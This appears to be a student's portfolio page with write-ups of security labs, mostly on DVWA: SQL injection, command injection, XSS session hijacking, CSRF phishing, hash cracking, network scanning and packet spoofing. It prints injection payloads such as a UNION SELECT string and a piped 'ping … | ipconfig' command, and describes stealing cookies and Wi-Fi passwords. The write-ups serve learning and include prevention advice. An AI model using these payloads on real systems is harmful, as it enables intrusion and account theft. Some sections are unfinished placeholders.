          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
